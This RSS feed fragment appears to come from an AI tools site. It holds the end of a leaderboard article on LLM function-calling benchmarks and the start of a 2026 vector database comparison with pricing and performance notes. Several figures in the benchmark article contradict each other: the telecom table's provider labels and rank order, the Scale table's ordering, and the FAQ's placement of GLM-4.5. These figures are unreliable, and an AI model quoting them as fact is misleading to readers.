          <td>Qwen3-Coder 480B A35B</td>
          <td>Alibaba</td>
          <td>0.600</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Claude Opus 4</td>
          <td>Anthropic</td>
          <td>0.596</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Claude 3.7 Sonnet</td>
          <td>Anthropic</td>
          <td>0.584</td>
      </tr>
      <tr>
          <td>10</td>
          <td>Claude Opus 4.1</td>
          <td>Anthropic</td>
          <td>0.560</td>
      </tr>
      <tr>
          <td>11</td>
          <td>o1</td>
          <td>OpenAI</td>
          <td>0.500</td>
      </tr>
      <tr>
          <td>11</td>
          <td>GPT-4.5</td>
          <td>OpenAI</td>
          <td>0.500</td>
      </tr>
      <tr>
          <td>13</td>
          <td>GPT-4.1</td>
          <td>OpenAI</td>
          <td>0.494</td>
      </tr>
      <tr>
          <td>14</td>
          <td>o4-mini</td>
          <td>OpenAI</td>
          <td>0.492</td>
      </tr>
      <tr>
          <td>15</td>
          <td>Qwen3-Next-80B-A3B-Thinking</td>
          <td>Alibaba</td>
          <td>0.490</td>
      </tr>
      <tr>
          <td>16</td>
          <td>Qwen3-235B-A22B-Thinking-2507</td>
          <td>Alibaba</td>
          <td>0.460</td>
      </tr>
      <tr>
          <td>17</td>
          <td>GPT-4o</td>
          <td>OpenAI</td>
          <td>0.428</td>
      </tr>
      <tr>
          <td>18</td>
          <td>GPT-4.1 mini</td>
          <td>OpenAI</td>
          <td>0.360</td>
      </tr>
      <tr>
          <td>19</td>
          <td>GPT-4.1 nano</td>
          <td>OpenAI</td>
          <td>0.140</td>
      </tr>
  </tbody>
</table>
<h3 id="retail-domain">Retail Domain</h3>
<p>Data from <a href="https://llm-stats.com/benchmarks/tau-bench-retail">llm-stats.com</a>, accessed April 2026. 25 models assessed; average score varies.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>Retail Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Claude Sonnet 4.5</td>
          <td>Anthropic</td>
          <td>0.862</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Claude Opus 4.1</td>
          <td>Anthropic</td>
          <td>0.824</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Claude Opus 4</td>
          <td>Anthropic</td>
          <td>0.814</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Claude 3.7 Sonnet</td>
          <td>Anthropic</td>
          <td>0.812</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Claude Sonnet 4</td>
          <td>Anthropic</td>
          <td>0.805</td>
      </tr>
      <tr>
          <td>6</td>
          <td>GLM-4.5</td>
          <td>Zhipu AI</td>
          <td>0.797</td>
      </tr>
      <tr>
          <td>7</td>
          <td>GLM-4.5-Air</td>
          <td>Zhipu AI</td>
          <td>0.779</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Qwen3-Coder 480B A35B</td>
          <td>Alibaba</td>
          <td>0.775</td>
      </tr>
      <tr>
          <td>9</td>
          <td>o4-mini</td>
          <td>OpenAI</td>
          <td>0.718</td>
      </tr>
      <tr>
          <td>10</td>
          <td>o1</td>
          <td>OpenAI</td>
          <td>0.708</td>
      </tr>
      <tr>
          <td>11</td>
          <td>Qwen3-Next-80B-A3B-Thinking</td>
          <td>Alibaba</td>
          <td>0.696</td>
      </tr>
      <tr>
          <td>12</td>
          <td>Claude 3.5 Sonnet</td>
          <td>Anthropic</td>
          <td>0.692</td>
      </tr>
      <tr>
          <td>13</td>
          <td>GPT-4.5</td>
          <td>OpenAI</td>
          <td>0.684</td>
      </tr>
      <tr>
          <td>14</td>
          <td>GPT-4.1</td>
          <td>OpenAI</td>
          <td>0.680</td>
      </tr>
      <tr>
          <td>15</td>
          <td>GPT-4o</td>
          <td>OpenAI</td>
          <td>0.603</td>
      </tr>
  </tbody>
</table>
<p>The pattern is consistent: Anthropic holds the top five retail positions, with Claude Sonnet 4.5 posting 0.862 - 3.8 points ahead of the next model. GLM-4.5 at sixth (0.797) is the first non-Anthropic model, and it scores higher than GPT-4.5 (0.684), which is worth noting for cost-sensitive buyers.</p>
<hr>
<h2 id="tau2-bench-telecom-extended-domain">tau2-bench Telecom (Extended Domain)</h2>
<p>The tau2-bench telecom dataset, tracked at <a href="https://artificialanalysis.ai/evaluations/tau2-bench">artificialanalysis.ai</a>, extends the original benchmark into telecommunications customer service with more complex policy trees. GPT-5.2 Thinking set a high bar at 98.7%, and GLM models have since pushed the reported ceiling even higher.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>Telecom Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>GLM-4.7-Flash (Reasoning)</td>
          <td>Alibaba</td>
          <td>98.8%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>GLM-5V Turbo (Reasoning)</td>
          <td>Alibaba</td>
          <td>98.5%</td>
      </tr>
      <tr>
          <td>3</td>
          <td>GLM-5-Turbo</td>
          <td>Alibaba</td>
          <td>98.5%</td>
      </tr>
      <tr>
          <td>4</td>
          <td>GPT-5.2 Thinking</td>
          <td>OpenAI</td>
          <td>98.7%</td>
      </tr>
  </tbody>
</table>
<p>One important caveat: these telecom scores look spectacular, but the benchmark's specific policy constraints also make it more susceptible to overfitting. No model scored above 49% when the paper was first published. The rapid climb to 98%+ suggests some combination of genuine capability improvement and possible training data exposure. Treat telecom scores as directionally useful, not as definitive.</p>
<p><img src="/images/leaderboards/function-calling-benchmarks-leaderboard-agents.jpg" alt="A team working on agentic AI workflows and tool orchestration strategy">
<em>Multi-turn tool use benchmarks like tau-bench are harder to game than single-turn evaluations because errors compound across multiple conversation turns.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="fintrace-rankings-financial-tool-calling">FinTrace Rankings (Financial Tool Calling)</h2>
<p>FinTrace, published April 2026 (<a href="https://arxiv.org/abs/2604.10015">arXiv:2604.10015</a>), evaluated 13 LLMs across 800 annotated financial task trajectories. The rubric grades nine metrics along four axes - action correctness, execution efficiency, process quality, and output quality.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>FinTrace Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Claude Opus 4.6</td>
          <td>Anthropic</td>
          <td>0.788</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Claude Sonnet 4.6</td>
          <td>Anthropic</td>
          <td>0.750</td>
      </tr>
      <tr>
          <td>3</td>
          <td>GPT-5.4</td>
          <td>OpenAI</td>
          <td>0.737</td>
      </tr>
      <tr>
          <td>Mid-tier</td>
          <td>Gemini 3 Flash</td>
          <td>Google</td>
          <td>~0.450</td>
      </tr>
  </tbody>
</table>
<p>The FinTrace authors found that frontier models handle tool selection reliably but consistently struggle with information use and final answer quality. Picking the right function to call isn't the hard part anymore - doing something useful with the result is. That finding holds across all 13 models tested, including the top scorers.</p>
<hr>
<h2 id="scale-labs-enterprise-tool-use">Scale Labs Enterprise Tool Use</h2>
<p>For a broader single-turn tool use perspective, Scale Labs runs an enterprise evaluation against 35 models. Top performers as of the most recent snapshot at <a href="https://labs.scale.com/leaderboard/tool_use_enterprise">labs.scale.com/leaderboard/tool_use_enterprise</a>:</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>o1 (Dec 2024)</td>
          <td>OpenAI</td>
          <td>70.1 ±5.3</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Gemini 2.5 Pro Experimental</td>
          <td>Google</td>
          <td>68.8 ±5.4</td>
      </tr>
      <tr>
          <td>3</td>
          <td>o1 Pro</td>
          <td>OpenAI</td>
          <td>67.0 ±5.4</td>
      </tr>
      <tr>
          <td>4</td>
          <td>o1-preview</td>
          <td>OpenAI</td>
          <td>66.4 ±5.5</td>
      </tr>
      <tr>
          <td>5</td>
          <td>DeepSeek-R1</td>
          <td>DeepSeek</td>
          <td>65.3 ±5.5</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Claude 3.7 Sonnet Thinking</td>
          <td>Anthropic</td>
          <td>65.3 ±5.5</td>
      </tr>
      <tr>
          <td>7</td>
          <td>GPT-4o (May 2024)</td>
          <td>OpenAI</td>
          <td>64.6 ±5.5</td>
      </tr>
      <tr>
          <td>8</td>
          <td>GPT-4.5 Preview</td>
          <td>OpenAI</td>
          <td>63.8 ±5.6</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Llama 3.1 405B Instruct</td>
          <td>Meta</td>
          <td>50.4 ±5.8</td>
      </tr>
      <tr>
          <td>10</td>
          <td>GPT-4o mini</td>
          <td>OpenAI</td>
          <td>51.7 ±5.8</td>
      </tr>
  </tbody>
</table>
<p>This leaderboard uses older model checkpoints (the most recent version evaluated is from early 2025), so it doesn't reflect current frontier capability. It's still useful as a reference for enterprise buyers comparing older deployments and for seeing how reasoning models (o1, o1 Pro) compare to standard models on structured API tasks.</p>
<hr>
<h2 id="key-takeaways">Key Takeaways</h2>
<h3 id="the-bfcl-tau-bench-split-tells-the-real-story">The BFCL-tau-bench split tells the real story</h3>
<p>The biggest insight from these numbers is that BFCL and tau-bench don't agree on model ranking - and they shouldn't, because they're testing different things. BFCL rewards single-call precision; tau-bench rewards sustained reliability across a multi-turn conversation. Claude Opus 4 scores 25.3% on BFCL and 0.814 on tau-bench retail. That isn't a contradiction - it means Claude handles multi-turn tool orchestration well but formats outputs in ways that trip up BFCL's AST parser.</p>
<p>For most production use cases, tau-bench scores matter more. Real agents don't make a single tool call and stop.</p>
<h3 id="open-weight-models-are-competitive-on-structured-calling">Open-weight models are competitive on structured calling</h3>
<p>GLM-4.5 tops BFCL v3 at 76.7%, and Qwen3 32B is right behind at 75.7%. Both are available open-weight. Anthropic's closed models dominate tau-bench, but for applications that need raw function-call accuracy without the conversational overhead, the open-weight options are genuinely strong. Our <a href="/guides/how-to-run-open-source-llm-locally/">guide to running open-source LLMs locally</a> covers setup if you want to benchmark these yourself.</p>
<h3 id="the-thinking-premium-is-marginal-for-tool-calling">The &quot;thinking&quot; premium is marginal for tool calling</h3>
<p>Several model pairs in the BFCL v3 table show identical scores for the base and &quot;Thinking&quot; variant (GLM-4.7-Flash and GLM-4.7-Flash Thinking both score 74.6%; Kimi K2.5 and Kimi K2.5 Thinking both score 64.5%). Extended chain-of-thought doesn't help on well-formed single-call evaluations. It helps on complex multi-step planning - which is what tau-bench and FinTrace measure. So the decision of whether to use a reasoning model should depend on your task structure, not just the model tier.</p>
<h3 id="fintrace-exposes-the-output-problem">FinTrace exposes the output problem</h3>
<p>The FinTrace finding - that all models struggle with information utilization more than tool selection - points to the next frontier in function calling research. Models have gotten good at choosing the right tool. They haven't gotten comparably good at reasoning over the result before taking the next step. This matters enormously for financial, medical, and legal agent workflows where a tool returns a document and the agent needs to extract the right number from it before continuing.</p>
<hr>
<h2 id="practical-guidance">Practical Guidance</h2>
<p><strong>Building a customer service or task automation agent:</strong> Use Claude Sonnet 4.5 or Claude Opus 4. Both consistently lead tau-bench across domains, and the multi-turn reliability gap between them and GPT-4.1 is large enough to matter in production. See our review of <a href="/models/claude-opus-4-6/">Claude Opus 4.6</a> for a deeper look at Anthropic's flagship line.</p>
<p><strong>Structured data extraction or API integration with exact schema requirements:</strong> Check the BFCL v3 table and prioritize GLM-4.5 or Qwen3 32B if output format compliance is your bottleneck. If you're running closed APIs through OpenAI, Nova Pro 1.0 (67.9% on BFCL v3) sits well above GPT-4.1 on structured calling.</p>
<p><strong>Multi-hop tool chains (MCP, complex pipelines):</strong> MCP-Bench data is limited, but its findings indicate that cross-tool coordination and parameter precision are still hard problems regardless of model tier. Our <a href="/guides/what-is-mcp/">guide on what MCP is and how to use it</a> covers the protocol layer if you're designing the tool interface rather than just selecting a model.</p>
<p><strong>Financial or high-stakes domain tool use:</strong> FinTrace scores put Claude Opus 4.6 (0.788) and Claude Sonnet 4.6 (0.750) ahead of GPT-5.4 (0.737). The gap isn't large, and the benchmark itself is new enough that you should treat these numbers as signals rather than verdicts. Fine-tune on domain-specific tool trajectories if stakes are high - FinTrace-Training (8,196 annotated trajectories) is public.</p>
<hr>
<h2 id="methodology-notes-and-caveats">Methodology Notes and Caveats</h2>
<p>A few things to keep in mind when interpreting these tables:</p>
<p>BFCL v3 evaluates models as of the snapshot date and doesn't account for system prompt changes, context windows, or whether the model is being called with tool-use instructions or not. Provider settings matter.</p>
<p>Tau-bench is stochastic - it uses an LLM to simulate the user, and scores vary across runs. The Pass@k metric helps, but single published numbers should carry error bars that most leaderboard aggregators don't show. The tau-bench airline and retail numbers above come from llm-stats.com's snapshot and may not match Sierra Research's official site for newer models.</p>
<p>FinTrace and MCP-Bench are 2025-2026 publications with limited model coverage. They're worth watching as evaluation harnesses, but neither yet has the breadth of BFCL.</p>
<p>The Scale Labs enterprise leaderboard has excellent methodology documentation but runs on older model versions. Don't use it to compare GPT-5 vs. Claude 4.x.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-model-is-best-for-function-calling-overall">Which model is best for function calling overall?</h3>
<p>No single model leads every benchmark. For multi-turn tool use, Claude Sonnet 4.5. For single-call format precision, GLM 4.5. For financial workflows, Claude Opus 4.6.</p>
<h3 id="why-does-claude-score-so-low-on-bfcl-but-high-on-tau-bench">Why does Claude score so low on BFCL but high on tau-bench?</h3>
<p>BFCL uses AST parsing to check output format. Claude wraps responses conversationally, which fails the parser even when tool selection is correct. Tau-bench measures task completion, where Claude's reasoning over outputs is an advantage.</p>
<h3 id="are-open-weight-models-competitive-with-closed-apis-for-tool-use">Are open-weight models competitive with closed APIs for tool use?</h3>
<p>On BFCL v3, yes - GLM 4.5 and Qwen3 32B beat every closed API in the table. On tau-bench multi-turn tasks, Anthropic closed models hold a consistent lead, though GLM-4.5 runs competitively at rank 3-4.</p>
<h3 id="how-often-do-these-rankings-change">How often do these rankings change?</h3>
<p>BFCL updates with new model submissions irregularly - major frontier releases tend to appear within weeks of launch. Tau-bench and FinTrace are less frequently updated. Check the source leaderboards linked in the Sources section for the latest snapshots.</p>
<h3 id="whats-the-difference-between-tau-bench-and-tau2-bench">What's the difference between tau-bench and tau2-bench?</h3>
<p>The original tau-bench covers airline and retail customer service. Tau2-bench adds a telecom domain with more complex policy constraints. Scores aren't comparable across domains.</p>
<h3 id="does-function-calling-performance-transfer-to-mcp-tool-use">Does function calling performance transfer to MCP tool use?</h3>
<p>Partially. BFCL and tau-bench measure direct function calls in controlled setups. MCP-Bench adds tool discovery and cross-server coordination. Models that score well on BFCL don't automatically handle MCP workflows well, according to the Accenture paper's findings.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://gorilla.cs.berkeley.edu/leaderboard.html">Berkeley Function Calling Leaderboard (BFCL) V4</a></li>
<li><a href="https://pricepertoken.com/leaderboards/benchmark/bfcl-v3">BFCL v3 model rankings - pricepertoken.com</a></li>
<li><a href="https://llm-stats.com/benchmarks/bfcl">BFCL benchmark - llm-stats.com</a></li>
<li><a href="https://github.com/sierra-research/tau-bench">tau-bench GitHub repository</a></li>
<li><a href="https://llm-stats.com/benchmarks/tau-bench-airline">tau-bench airline - llm-stats.com</a></li>
<li><a href="https://llm-stats.com/benchmarks/tau-bench-retail">tau-bench retail - llm-stats.com</a></li>
<li><a href="https://benchlm.ai/benchmarks/tauBench">BenchLM tau-bench snapshot</a></li>
<li><a href="https://artificialanalysis.ai/evaluations/tau2-bench">tau2-bench telecom leaderboard - Artificial Analysis</a></li>
<li><a href="https://arxiv.org/abs/2604.10015">FinTrace: Holistic Trajectory-Level Evaluation of LLM Tool Calling (arXiv:2604.10015)</a></li>
<li><a href="https://arxiv.org/abs/2508.20453">MCP-Bench: Benchmarking Tool-Using LLM Agents (arXiv:2508.20453)</a></li>
<li><a href="https://github.com/OpenBMB/ToolBench">ToolBench - OpenBMB GitHub</a></li>
<li><a href="https://labs.scale.com/leaderboard/tool_use_enterprise">Scale Labs Enterprise Tool Use Leaderboard</a></li>
<li><a href="https://llm-stats.com/leaderboards/best-ai-for-tool-calling">Best AI for Tool Calling - llm-stats.com</a></li>
<li><a href="https://benchlm.ai/llm-agent-benchmarks">BenchLM LLM Agent and Tool-Use Benchmarks</a></li>
<li><a href="https://huggingface.co/spaces/Nexusflow/Nexus_Function_Calling_Leaderboard">Nexus Function Calling Leaderboard - Hugging Face</a></li>
<li><a href="https://arxiv.org/abs/2604.13519">ToolSpec: Accelerating Tool Calling (arXiv:2604.13519)</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Leaderboards</category><media:content url="https://awesomeagents.ai/images/leaderboards/function-calling-benchmarks-leaderboard_hu_d7545c1eca026844.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/leaderboards/function-calling-benchmarks-leaderboard_hu_d7545c1eca026844.jpg" width="1200" height="675"/></item><item><title>Best AI Vector Databases 2026 - Full Comparison</title><link>https://awesomeagents.ai/tools/best-ai-vector-databases-2026/</link><pubDate>Fri, 17 Apr 2026 14:05:48 +0200</pubDate><guid>https://awesomeagents.ai/tools/best-ai-vector-databases-2026/</guid><description><![CDATA[<p>The vector database market has fractured into at least four distinct product categories that happen to share a name. There's the fully managed SaaS layer (Pinecone, Weaviate Cloud, Zilliz Cloud), the self-hosted open-source engines (Qdrant, Milvus, Weaviate OSS), the embedded libraries you ship inside your application (Chroma, LanceDB), and the &quot;just use what you already have&quot; options (pgvector, Redis, OpenSearch, MongoDB Atlas, SingleStore). Each category makes different trade-offs, and picking the wrong one for your workload is an expensive mistake to fix later.</p>]]></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>The vector database market has fractured into at least four distinct product categories that happen to share a name. There's the fully managed SaaS layer (Pinecone, Weaviate Cloud, Zilliz Cloud), the self-hosted open-source engines (Qdrant, Milvus, Weaviate OSS), the embedded libraries you ship inside your application (Chroma, LanceDB), and the &quot;just use what you already have&quot; options (pgvector, Redis, OpenSearch, MongoDB Atlas, SingleStore). Each category makes different trade-offs, and picking the wrong one for your workload is an expensive mistake to fix later.</p>
<p>This article covers all 12 options with verified pricing from official pages checked in April 2026, benchmark data from <a href="https://github.com/zilliztech/VectorDBBench">VectorDBBench</a> and Qdrant's open-source benchmark suite, and honest commentary on where the marketing oversells reality.</p>
<p>If you're looking at the end-to-end retrieval stack - frameworks like LangChain, LlamaIndex, and Haystack that sit on top of these databases - see our <a href="/tools/best-ai-rag-tools-2026/">best RAG tools comparison</a>. For embedding model selection, the <a href="/leaderboards/embedding-model-leaderboard-mteb-march-2026/">MTEB leaderboard coverage</a> has the current rankings. If you're newer to the architecture pattern, <a href="/guides/what-is-rag/">what is RAG</a> covers the fundamentals.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Best fully managed: Pinecone Serverless for small-medium workloads; Weaviate Dedicated or Zilliz Cloud for large scale</li>
<li>Best self-hosted: Qdrant for filtered search performance and Rust-level efficiency; Milvus for billion-scale writes</li>
<li>Best &quot;no new infra&quot;: pgvector if you already run Postgres; Turbopuffer if cost is the primary driver at scale</li>
<li>Hybrid search (BM25 + dense vectors) is now table-stakes - every serious option has it</li>
</ul>
</div>
<h2 id="the-benchmark-reality-check">The Benchmark Reality Check</h2>
<p>Before the individual reviews, some important context on the numbers floating around this space.</p>
<p>Every vendor publishes benchmarks that favor their product. Qdrant's open-source benchmark suite tests only open-source engines, which is at least methodologically consistent. Zilliz's VectorDBBench includes managed cloud services but was built by the Milvus maintainers. Redis's benchmark blog put Redis 3.4x ahead of Qdrant in QPS - at lower recall thresholds where Redis traded accuracy for speed.</p>
<p>The numbers that matter for production RAG workloads are: <strong>p99 latency under concurrent load</strong> and <strong>recall at k=10 with 95%+ threshold</strong>. Single-threaded p50 benchmarks don't tell you what happens when your app has real traffic.</p>
<p>With that caveat: at 1M vectors (768 dimensions), Qdrant's benchmark shows it achieving roughly 1,200 QPS at 99% recall, Milvus indexing faster than most alternatives but showing some degradation at 10M+ vectors in lower dimensions, and Elasticsearch running up to 10x slower at 10M vectors of 96 dimensions compared to purpose-built engines.</p>
<p>Turbopuffer's architecture gives it 10ms p90 warm-cache performance but 444ms p90 cold-cache, which matters if you have a long tail of rarely-queried namespaces.</p>
<hr>
<h2 id="comparison-table">Comparison Table</h2>
<table>
  <thead>
      <tr>
          <th>Database</th>
          <th>Self-Host</th>
          <th>Managed Cloud</th>
          <th>Free Tier</th>
          <th>Hybrid Search</th>
          <th>Starting Price</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Pinecone</td>
          <td>No</td>
          <td>Yes</td>
          <td>Yes (2GB, 2M RU/mo)</td>
          <td>Yes (via sparse)</td>
          <td>$50/mo minimum</td>
      </tr>
      <tr>
          <td>Qdrant</td>
          <td>Yes (free)</td>
          <td>Yes</td>
          <td>Yes (1GB cluster)</td>
          <td>Yes</td>
          <td>$0.014/hr cloud</td>
      </tr>
      <tr>
          <td>Weaviate</td>
          <td>Yes (free)</td>
          <td>Yes</td>
          <td>14-day trial</td>
          <td>Yes (native)</td>
          <td>$45/mo Flex</td>
      </tr>
      <tr>
          <td>Milvus / Zilliz</td>
          <td>Yes (free)</td>
          <td>Zilliz Cloud</td>
          <td>Yes (5GB + 2.5M vCUs)</td>
          <td>Yes</td>
          <td>$99/mo dedicated</td>
      </tr>
      <tr>
          <td>Chroma</td>
          <td>Yes (free)</td>
          <td>No</td>
          <td>Always free</td>
          <td>Limited</td>
          <td>$0 self-hosted</td>
      </tr>
      <tr>
          <td>pgvector</td>
          <td>Yes (free)</td>
          <td>Via cloud Postgres</td>
          <td>Via free Postgres tiers</td>
          <td>Via pg_search</td>
          <td>$0 extension</td>
      </tr>
      <tr>
          <td>Redis Vector</td>
          <td>Yes (free)</td>
          <td>Redis Cloud</td>
          <td>Yes (30MB)</td>
          <td>Yes (FT.HYBRID)</td>
          <td>~$5/mo Essentials</td>
      </tr>
      <tr>
          <td>LanceDB</td>
          <td>Yes (free)</td>
          <td>Beta (usage-based)</td>
          <td>$100 credits</td>
          <td>Yes</td>
          <td>$0 self-hosted</td>
      </tr>
      <tr>
          <td>Turbopuffer</td>
          <td>No</td>
          <td>Yes (serverless)</td>
          <td>No</td>
          <td>Yes</td>
          <td>$64/mo minimum</td>
      </tr>
      <tr>
          <td>Elastic / OpenSearch</td>
          <td>Yes (free)</td>
          <td>Yes</td>
          <td>Limited</td>
          <td>Yes (ELSER)</td>
          <td>Varies by instance</td>
      </tr>
      <tr>
          <td>MongoDB Atlas</td>
          <td>No</td>
          <td>Yes</td>
          <td>Yes (512MB)</td>
          <td>Yes (Atlas Search)</td>
          <td>Flex ~$30/mo cap</td>
      </tr>
      <tr>
          <td>SingleStore</td>
          <td>Yes (limited)</td>
          <td>Yes</td>
          <td>Yes (free tier)</td>
          <td>Yes (native SQL)</td>
          <td>Custom</td>
      </tr>
  </tbody>
</table>
<p><img src="/images/tools/best-ai-vector-databases-2026-benchmark.jpg" alt="Server racks in a data center - the physical infrastructure underlying vector database services">
<em>The storage and compute infrastructure behind managed vector database services runs on the same data center hardware - the real differentiation is in the index structure, query engine, and operational experience above the metal.</em>
<small>Source: unsplash.com</small></p>
<hr>
<h2 id="pinecone---best-for-teams-that-want-zero-ops">Pinecone - Best for Teams That Want Zero Ops</h2>
<p>Pinecone's serverless architecture is still the fastest path from zero to a working vector search endpoint. There's no cluster to configure, no index parameters to tune, and the free Starter tier includes 2GB storage, 2M write units/month, and 1M read units/month with no credit card required.</p>
<p>The Standard plan has a $50/month minimum and charges $0.33/GB/month for storage, $4/million write units, and $16/million read units. Enterprise is $500/month minimum and adds 99.95% uptime SLA, private networking, and HIPAA support.</p>
<h3 id="the-read-unit-cliff">The read unit cliff</h3>
<p>Pinecone's pricing model has a structural problem at scale that their docs don't highlight enough. Read unit consumption is 1 RU per 1GB of namespace queried, with a 0.25 RU minimum per query. That seems fine until your namespace grows. At 50GB of vectors, a single query costs 50 RUs. Run 5M queries/month against that namespace and you're at 250M RUs - which is $4,000/month in read costs alone on Standard. Self-hosting Qdrant on a 16GB RAM node would run $96/month for the same data.</p>
<p>Pinecone's query API is proprietary. Migrating off at scale is painful because there's no standard wire protocol. That's worth pricing into your decision upfront.</p>
<p><strong>Integrations:</strong> LangChain, LlamaIndex, Haystack, Vertex AI, AWS Bedrock - all first-class support.</p>
<hr>
<h2 id="qdrant---best-open-source-performance">Qdrant - Best Open-Source Performance</h2>
<p>Qdrant is written in Rust and built specifically for vector similarity search with complex metadata filtering. The cloud free tier gives you a single-node cluster permanently at no cost. Paid cloud nodes start at $0.014/hour (roughly $10/month for the smallest configuration). A 16GB RAM / 4 vCPU production cluster on AWS via Qdrant Cloud runs roughly $96/month with no per-query billing.</p>
<p>Self-hosting is free under Apache 2.0 with no limits other than your hardware. A three-node production cluster on AWS typically runs $300-500/month depending on instance types.</p>
<h3 id="where-it-actually-leads">Where it actually leads</h3>
<p>Filtered vector search is where Qdrant's engineering shows most clearly. When you combine similarity search with strict metadata conditions - &quot;find the 10 most similar documents where <code>source=legal</code> and <code>date&gt;2025-01-01</code>&quot; - Qdrant's payload filtering engine consistently beats alternatives in Qdrant's own benchmarks (which, again, should be reproduced independently before you bet your architecture on them).</p>
<p>The benchmark suite at <a href="https://qdrant.tech/benchmarks/">qdrant.tech/benchmarks</a> shows Qdrant achieving highest RPS and lowest latencies across most tested configurations. Milvus is notably faster at index build time. Redis shows higher raw QPS at lower recall thresholds.</p>
<p><strong>Hybrid search:</strong> Supports dense + sparse vector search natively. BM25 integration via sparse embedding models.</p>
<p><strong>Integrations:</strong> LangChain, LlamaIndex, Haystack, all have maintained connectors.</p>
<hr>
<h2 id="weaviate---best-native-hybrid-search">Weaviate - Best Native Hybrid Search</h2>
<p>Weaviate's main differentiator is that hybrid search (BM25 + dense vectors with score fusion) ships as a first-class query primitive, not a bolted-on feature. You don't need to run a separate text search index and merge results at the application layer. The built-in <code>hybrid</code> query parameter handles it in one call.</p>
<p>Cloud pricing shifted in October 2025. The Flex plan starts at $45/month (shared deployment, pay-as-you-go), Plus starts at $400/month (dedicated or shared, prepaid contract). Pricing dimensions now include vector dimensions ($0.00975-$0.01668 per million depending on compression method), storage ($0.2125-$0.31875 per GiB), and backup ($0.022-$0.033 per GiB). For 10M objects at 1,536 dimensions without compression, expect roughly $1,459/month before backup costs.</p>
<p>Compression matters here. Weaviate supports product quantization (PQ) and binary quantization (BQ), which can reduce vector storage by 4-32x at some recall cost. For most RAG workloads where you're trading off a few percentage points of recall for 8x lower storage cost, the math usually works.</p>
<p>Self-hosted Weaviate is free and open-source. Docker Compose deployment is straightforward for development; Kubernetes is the production path.</p>
<h3 id="weaviates-vectorizer-modules">Weaviate's vectorizer modules</h3>
<p>One truly useful feature: Weaviate can call embedding models automatically on data import through its vectorizer module system. You configure which model to use, push raw text, and Weaviate handles the embedding calls. This reduces the application code needed to maintain an embedding pipeline. The trade-off is that it obscures the embedding step and creates a tight coupling between your database and your embedding provider.</p>
<hr>
<h2 id="milvus--zilliz-cloud---best-for-billion-scale">Milvus / Zilliz Cloud - Best for Billion-Scale</h2>
<p>Milvus is the open-source project; Zilliz Cloud is the fully managed version. At the scale where most databases start struggling - 100M+ vectors, high write throughput - Milvus was architecturally designed for it. It separates storage, compute, and indexing into distinct services, which means you can scale each dimension independently.</p>
<p>Zilliz Cloud pricing in early 2026: the free tier includes 5GB storage and 2.5M vCUs monthly. Serverless charges $4 per million vCUs (virtual compute units). Dedicated clusters start at $99/month. In October 2025, Zilliz introduced tiered storage delivering a 87% storage cost reduction and standardized storage pricing at $0.04/GB/month across AWS, Azure, and GCP.</p>
<p>Milvus 2.6.x (now on Zilliz Cloud) introduced cloud-only index optimizations that further reduce TCO for billion-scale deployments.</p>
<h3 id="the-ops-burden">The ops burden</h3>
<p>Running Milvus self-hosted in production is real work. It requires etcd, MinIO (or S3), and multiple Milvus service components. The Helm chart works, but understanding what each component does and how to size it takes time. Zilliz Cloud removes this completely, at cost. For teams without dedicated infrastructure engineers, self-hosting Milvus at production scale is probably the wrong call.</p>
<p><strong>Integrations:</strong> Full support in LangChain, LlamaIndex, and Haystack.</p>
<hr>
<h2 id="chroma---best-for-local-development">Chroma - Best for Local Development</h2>
<p>Chroma is the default vector database for tutorials and early prototyping because the API is genuinely simple and the Python library installs in one command. The 2025 Rust rewrite improved write and query performance significantly over the original Python implementation.</p>
<p>There's no cloud managed offering. Chroma is embedded, in-memory first (with optional disk persistence), and designed for single-node deployments. Self-hosting on a 4GB VPS costs under $30/month and handles millions of embeddings for most development workloads.</p>
<p>The honest assessment: Chroma doesn't belong in production RAG systems handling more than a few million vectors with concurrent traffic. The memory-first architecture hits a wall when data no longer fits in RAM. For anything production at scale, it's a stepping stone to a proper deployment.</p>
<p><strong>Hybrid search:</strong> Basic keyword + vector combination, less capable than purpose-built hybrid search in Qdrant or Weaviate.</p>
<hr>
<h2 id="pgvector---best-if-you-already-run-postgres">pgvector - Best If You Already Run Postgres</h2>
<p>Pgvector extends PostgreSQL with vector storage and approximate nearest-neighbor search via HNSW and IVF_FLAT indexes. If your application already runs on Postgres, adding vector search costs you nothing in infrastructure. Your documents and embeddings live in the same table, metadata filtering uses standard SQL WHERE clauses, and there's no synchronization pipeline to maintain.</p>
<p>The gradual cost is effectively zero if you have spare capacity on your existing database. A dedicated Postgres instance for a vector workload runs $30-80/month depending on size. Every managed Postgres provider - Supabase, Neon, RDS, AlloyDB, Azure Database for PostgreSQL - supports pgvector as an extension.</p>
<h3 id="the-limits">The limits</h3>
